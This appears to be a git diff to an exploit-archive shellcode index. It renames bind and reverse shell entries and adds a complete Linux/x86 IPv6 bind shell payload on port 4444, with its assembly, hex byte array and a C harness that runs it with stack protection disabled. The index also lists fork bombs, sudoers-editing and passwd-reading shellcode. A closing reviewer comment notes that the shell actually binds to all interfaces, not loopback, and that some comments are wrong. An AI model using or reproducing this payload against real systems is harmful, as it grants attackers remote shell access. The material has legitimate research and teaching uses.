-42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
-42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
-42339,shellcodes/linux_x86-64/42339.c,"Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
+42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
+42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
+42339,shellcodes/linux_x86-64/42339.c,"Linux/x64 - Reverse (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
 42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
-42485,shellcodes/linux_x86-64/42485.c,"Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
+42485,shellcodes/linux_x86-64/42485.c,"Linux/x64 - Reverse (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
 42522,shellcodes/linux_x86-64/42522.c,"Linux/x64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
 42523,shellcodes/linux_x86-64/42523.c,"Linux/x64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
 42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
-42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
-42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
+42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
+42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
 42791,shellcodes/linux_x86-64/42791.c,"Linux/x64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
 42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
 42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
@@ -874,13 +874,14 @@ id,file,description,date,author,type,platform
 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
 44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
-44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
+44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
 44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)",2018-04-24,absolomb,shellcode,linux_x86
-44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse TCP (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
+44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
 44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
-44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
+44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
 44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
-44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86
+44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86
+44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44723.c b/shellcodes/linux_x86/44723.c
new file mode 100644
index 000000000..3442d82c6
--- /dev/null
+++ b/shellcodes/linux_x86/44723.c
@@ -0,0 +1,112 @@ +// # Title: Linux/x86 - IPv6 TCP bind tcp shell on 4444 port +// # Length : 113 bytes +// # Author : Matteo Malvica +// # Tested On : kali linux 4.15 +// # Contact : matteo@malvica.com +// # Description: it creates an IPv6 socket on localhost ::1 and listens on port 4444 + +/* + +global _start +section .text + +_start: + +;; ipv6 socket creation +push 0x6 ; protocol IPv6 +push 0x1 ; socket_type=SOCK_STREAM (0x1) +push 0xa ; AF_INET6 +xor eax,eax ; zero out eax +xor ebx,ebx ; zero out ebx +mov al,0x66 ; syscall: sys_socketcall + cleanup eax register +inc ebx ; 1 = SYS_socket +mov ecx,esp ; save pointer (ESP) to socket() args (ECX) +int 0x80 +mov esi,eax ; saves socket descriptor +xor eax,eax + +;;bind +push DWORD eax ;ipv6 loopback pushed as x4 dword +push DWORD eax +push DWORD eax +push DWORD eax +push DWORD eax ;sin6_addr +push WORD 0x5c11 ;port 4444 +push WORD 0x0a ;AF_INET6 +mov ecx,esp +push 0x1c +push ecx +push esi +dec ebx +mov bl,0x2 +mov ecx,esp +mov al,0x66 +int 80h + +;;listen +xor eax,eax +xor ebx,ebx +push byte 0x2 +push esi +mov ecx,esp +mov bl,0x4 +mov al,0x66 +int 80h + +;;accept +xor ebx,ebx +push ebx +push ebx +push esi +mul ebx +mov bl,0x5 +mov al,0x66 +mov ecx,esp +int 80h + +sub ecx, ecx +mov cl, 0x2 ;initiate counter +xchg ebx,eax ;save clientfd + +; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2) +loop2: + mov al, 0x3f ;syscall: sys_dup2 + int 0x80 ;exec sys_dup2 + dec ecx ;decrement loop-counter + jns loop2 ;as long as SF is not set -> jmp to loop + +;;execve(/bin//sh) +xor edx,edx +push edx ;null terminated /bin//sh +push 0x68732f2f ;"hs//" +push 0x6e69622f ;"nib/" +mov ebx,esp +push edx +push ebx +mov ecx,esp +mov al,0x0b ;execve() +int 0x80 + +*/ + +/* +to compile the shellcode + +$gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode +$./shellcode + +*/ + + +#include + +unsigned char shellcode[] = \ 
+"\x6a\x06\x6a\x01\x6a\x0a\x31\xc0\x31\xdb\xb0\x66\x43\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x4b\xb3\x02\x89\xe1\xb0\x66\xcd\x80\x31\xc0\x31\xdb\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xf7\xe3\xb3\x05\xb0\x66\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; + + +main() +{ + printf("Shellcode Length: %d\n", sizeof(shellcode) - 1); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file
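Review bot: The header comment says the socket is created "on localhost ::1" and the bind block labels its zero pushes `;ipv6 loopback pushed as x4 dword`, but the five `push DWORD eax` with eax cleared leave sin6_addr all zero, which is the unspecified address `::` rather than loopback, so the listener on port 4444 appears to be reachable on every interface. The description should read `// # Description: it creates an IPv6 socket bound to :: (all interfaces) and listens on port 4444`, since the bind address is the fact an analyst triaging this sample needs to get right. The comment on `push 0x6` should be `; protocol = IPPROTO_TCP (6)`, because 6 is the TCP protocol number and the address family is set by the `push 0xa` two lines below. In the C harness `sizeof` yields a size_t, so the length line should be `printf("Shellcode Length: %zu\n", sizeof(shellcode) - 1);` and `main()` should be declared `int main(void)`. The `#include` line shows no header name on this page; if that is how the file was committed rather than a rendering loss, it needs `#include <stdio.h>` for printf.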